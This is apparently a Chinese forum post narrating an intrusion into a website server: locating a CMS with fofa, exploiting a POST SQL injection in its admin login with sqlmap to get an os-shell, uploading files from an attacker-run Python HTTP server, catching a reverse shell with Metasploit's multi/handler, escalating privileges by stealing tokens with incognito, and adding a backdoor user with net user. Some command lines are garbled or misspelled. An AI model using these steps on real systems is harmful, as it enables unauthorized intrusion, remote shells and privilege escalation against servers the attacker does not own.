一 前言
这段时间一直在捣鼓sql注入和msf联合getshell,拿到网站服务器。 1.1收集信息因为主要想练习sql注入,所以信息收集做的比较简单:
通过sqlmap获取shell权限利用msf获取反弹shell并getshell成功
通过fofa找到相关cms
发现后台登录页面有post sql注入 1.2利用sqlmap一把梭并获取os-shell二.利用python搭建一个简单的http服务器python -m SimpleHTTPServer
1.1在这里要给他的服务器写入一个目录
md C: est
1.用自己的服务器上文件上传到被攻击服务器上
三 然后我们在msf上操作1.1 :输入 use exploit/mulit/hander1.2 : 输入 set lhost 接收反弹shell的ip1.2 :输入 run 一把嗦四.成功进入该服务器这时发现我们只有gust权限 难受五.开启艰难的提权之路1.1利用方法内核提权窃取管理tokens 提权弟弟目前只知道着两种
本文只利用tokens 提权方式 有机会写一篇 内核提权的文章
使用use incognito来加载会话令牌模块
然后list_tokens -u来列出会话令牌
———————————————————————————————————————————————————————————————————
提权成功 六.创建用户命令:net user 用户名 密码 /add 淦思索许久……发现忘了把自己加入管理员用户组了 !!!!!
搞定
| 
发表于 2021-4-18 09:31:32
|
/1 
发表于 2020-10-20 08:43:10
